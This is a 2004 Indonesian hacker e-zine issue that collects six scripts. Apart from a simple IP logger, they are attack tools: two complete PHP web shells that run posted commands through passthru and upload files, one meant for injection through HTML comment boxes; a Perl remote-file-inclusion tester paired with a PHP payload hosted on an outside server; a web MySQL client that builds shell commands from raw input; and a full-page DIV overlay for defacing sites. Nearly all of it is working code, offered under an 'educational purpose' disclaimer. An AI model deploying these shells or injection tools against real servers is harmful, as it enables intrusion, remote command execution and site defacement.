Copy Link
Add to Bookmark
Report
Echo Magazine Issue 09 Phile 0x013
- ____________________ ___ ___ ________
--\_ _____/\_ ___ \ / | \\_____ \--
-| __)_ / \ \// ~ \/ | \--
-| \\ \___\ Y / | \--
-/_______ / \______ /\___|_ /\_______ /-
- -\/ -\/ -\/ -\/-
.OR.ID
ECHO-ZINE RELEASE 09
Author: y3dips && K-159
Online @ www.echo.or.id :: http://ezine.echo.or.id
== ECHO Skrapt 2004 ==
01./Catet info browser dan IP >dot< php ~[ y3dips ]
02./Uplod File && $hell command via browser >dot< php ~[ y3dips ]
03.\General PHP injection Testing script >dot< perl ~[ y3dips ]
04.|MySQL management under web ~[ K-159 ]
05.\PHP upload file in HTML rulez.. ~[ K-159 ]
06.\using DIV to manipulating all of the page area :) (*smart enough isnt it) ~[k-159 ]
.: BEGIN
+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++
01. Skrip Untuk Mencatat IP dan INFO BROWSER
By : y3dips
Language : PHP
Resource : Buku php , from phpinfo(); (to get the variable)
Published: http://geocities.com/y3d1ps/scrapt/catatip.php.txt
Comment : skrip ini dibuat dengan bahasa pemrograman PHP , pd awalnya di gunakan pada
situs echo.or.id , untuk halaman index-nya
/*----- snip -----
<html>
<head>
<title> catet info browser dan ip </title>
<?php
if($HTTP_VIA == "")
printf("<div align= center>%s ::
diakses dari<i><b> ip </b></i> <b>$REMOTE_ADDR</b><br> dengan <i><b> browser</b></i>
<b> $HTTP_USER_AGENT</b> </div>",date("D, d F Y"));
else
printf("<div align= center>%s ::
</b> diakses dari<i><b> ip </b></i> <b>$HTTP_X_FORWARDED_FOR</b><br> dengan <i><b> browser</b></i>
<b>$HTTP_USER_AGENT</B> melalui <b>$HTTP_VIA</b> dengan ip <i>$REMOTE_ADDR</i></div>",date("D, d F Y"));
?>
</p>
</body>
</html>
------- snip -----*/
+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++
02. Uplod File && $hell command via browser >dot< php ~[ y3dips ]
By : y3dips
Language : PHP
Resource : .....PHP book, PHP manual <dot> chm
Published: ....
Comment : skrip ini dibuat dengan bahasa pemrograman PHP , digunakan sebagai halaman
untuk mengupload file dan eksekusi $hell command via browser , dengan beberapa
settingan 'tertentu' yang di "allow" pada php.ini dan httpd.conf
/*----- snip -----
<!-- upload php shell made by y3dips (echo.or.id) for test only -->
<!-- greetz to K-159 ,the_day, z3r0byt3, m0by , comex, c-a-s-e , S'to -->
<html>
<head>
<title>#E-C-H-O Upl0ad $hell</title>
</head>
<BODY bgcolor="#000000">
<!-- ngatur direktori -->
<? if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } ?>
<table>
<tr><td bgcolor=#cccccc>
<!-- eksekusi command dengan passthru -->
<?
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ; pwd ;id "; }
echo "<b>";
echo "<div align=left><textarea name=report cols=70 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
?>
</td></tr></table>
<!-- upload file -->
<?
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
{
copy($HTTP_POST_FILES["filenyo"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial>
<div>file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."</div></font></td></tr></table>");
}
?>
<table width=100% cellpadding=0 cellspacing=0 >
<tr><td>
<!-- form eksekusi command -->
<?
echo "<form name=command method=post>";
echo "<font face=Verdana size=1 color=red>";
echo "<b>[CmD ]</b><input type=text name=cmd size=33> ";
if ((!$_POST['dir']) OR ($_POST['dir']==""))
{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; }
echo " <input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 >
<!-- form upload -->
<?
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=1 color=red>";
echo "<b> [EcHo]</b>";
echo "<input type=file name=filenyo size=70> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
</html>
------- snip -----*/
+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++
03.\General PHP injection Testing script
By : y3dips
Language : PeRl
Resource : http://ezine.echo.or.id/ezine8/ez-r08-y3dips-becommunityeXplo.txt
Published: ... in this ezine
Comment : Skrip ini dibuat untuk testing remote injection terhadap php vuln
sebenarnya untuk menggantikan fungsi browser , khususnya lagi dikembangkan
dengan menggunakan file sebagai database target *_^
Petunjuk :
masukkan lengkap path target yang vulnerable sesuai vulnerablenya, misal :
$target = www.dudul.com/index.php?pageurl=
serta path lengkap exploit filenya (read about injection script in attacker side)
$xploit = www.keren.com/echo.txt
dan yang perlu dilakukan dalam inputan adalah
perl xplo.pl http://www.dudul.com/index.php?pageurl= www.keren.com/echo.txt
/*----- snip -----
# xplo.pl
#!/usr/bin/perl -w
# Remote Testing PHP injection by y3dips [for testing only]
print " * Remote Testing PHP injection by y3dips *\n";
require LWP::UserAgent;
if(@ARGV == 2)
{
$target= $ARGV[0];
$xploit= $ARGV[1];
my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;
$url = "http://$target$xploit";
my $injek = $ua->get($url);
print "---------------------------------------------------\n";
if ($injek->is_success)
{ print (" Sepertinya Vulnerable\n"); }
else { print (" Sepertinya Tidak Vulnerable\n"); }
print "---------------------------------------------------\n";
}
else{
print "Gunakan: perl $0 [path vulnerable] [path xplo] \n";
}
=====================
echo.txt
-- cut --
<?
echo "".passthru(' id ')."";
?>
-- cut --
------- snip -----*/
+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++
04.\MySQL management under web
By : k-159
Language : Php
Resource : ..., based on explorer 1.4 lost noobs
Published: ... in this ezine
Comment : Manage SQL under web base
/*----- snip -----
<!-- sql remote injection script by K-159 -->
<!-- @t http://aikmel.com en http://echo.or.id -->
<!-- based on explorer 1.4 lost noobs -->
<html>
<head><title>.:You Landed on K-159 Project:.</title>
<body bgcolor="blue">
<?
echo("
<FORM ENCTYPE=\"multipart/form-data\" METHOD=POST>
<br><br><hr><br><br>
Enter mysql client binary <br>
<input name=\"sql_client\" type=\"text\" value=\"mysql\">
<br><br>Enter the login<br>
<input name=\"sql_login\" type=\"text\" value=\"root\">
<br><br>Enter the password<br>
<input name=\"sql_password\" type=\"text\" value=\"none\">
<br><br>Enter address of target<br>
<input name=\"sql_host\" type=\"text\" value=\"Provide a target\">
<bR><br>Enter other port of mysql<br>
<input name=\"sql_options\" type=\"text\" value=\"\">
<br><br>Enter valid SQL queries<br>
<TEXTAREA input name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES;
# USE database_name; SHOW TABLES;
# SELECT * FROM table_name;</TEXTAREA>
<br><br><input name=\"submit\" type=\"submit\" value=\"Send !\">
<br><br><hr>
</font></form>
");
if($sql_client)
{
if ($sql_host == "Provide a target") // This checks that a target is set
{
echo("Please provide a valid target."); // No target is set
}
else if($sql_password == "none") // Ok for target, processing if no password is set
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------
");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); }
echo("</TEXTAREA>");
}
else // processing when target is ok and when a password is provided
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------
");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); }
echo("</TEXTAREA>");
} // end of else
}
?>
</html>
------- snip -----*/
+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++
05.\PHP upload file in HTML rulez..
By : k-159
Language : HTML
Resource : ...,
Published: ... in this ezine
Comment : skrip ini dibuat saat mencoba membuat upload skrip dengan menumpang di box (comment,
input) yang bisa hanya di inputkan html , but the server allow to execute php :)
/*----- snip -----
<html>
<head>
<title>K-159 Project</title>
</head>
<BODY bgcolor="#000000">
<script language="php">
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
</script>
<table>
<tr><td bgcolor=#cccccc>
<script language="php">
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ;uname -ar;pwd ;id;cat /etc/hosts "; }
echo "<b>";
echo "<div align=left><textarea name=report cols=70 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
</script>
</td></tr></table>
<script language="php">
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
{
copy($HTTP_POST_FILES["filenyo"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial>
<div>file [ ".$HTTP_POST_FILES["filenyo"][name]." ] Error Cuk !!
!!</div></font></td></tr></table>");
}
</script>
<table width=100% cellpadding=0 cellspacing=0 >
<tr><td>
<script language="php">
echo "<form name=command method=post>";
echo "<font face=Verdana size=1 color=red>";
echo "<b>[CmD ]</b><input type=text name=cmd size=33> ";
if ((!$_POST['dir']) OR ($_POST['dir']==""))
{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; }
echo " <input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
</script>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 >
<script language="php">
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=1 color=red>";
echo "<b> [EcHo]</b>";
echo "<input type=file name=filenyo size=70> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
</script>
</td></tr></table>
</html>
------- snip -----*/
+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++
06.\using DIV to manipulating all of the page area :) (*smart enough isnt it? )
By : k-159
Language : HTML
Resource : ...,
Published: ... in this ezine
Comment : skrip ini digunakan untuk menutupi seluruh skrip lainnya (dengan penggunaan DIV)
Petunjuk : letakkan potongan skrip ini di atas kode " page anda " :D
/*----- snip -----
<div id="Layer1" style="position:absolute; left:0; top:0; width:4000; height:4090;
z-index:1; background-color: #000000; layer-background-color: #ccccc; border: 1px none #000000">
------- snip -----*/
+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++
Disclamier:
all script on this article for educational purpose, echo.or.id does not accept responsibility
for any damage or injury caused as a result of its use
*greetz to:
anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel
all $ecurity Industry 1n INDONESIA
kirimkan kritik && saran ke echostaff[at]echo<dot>or<dot>id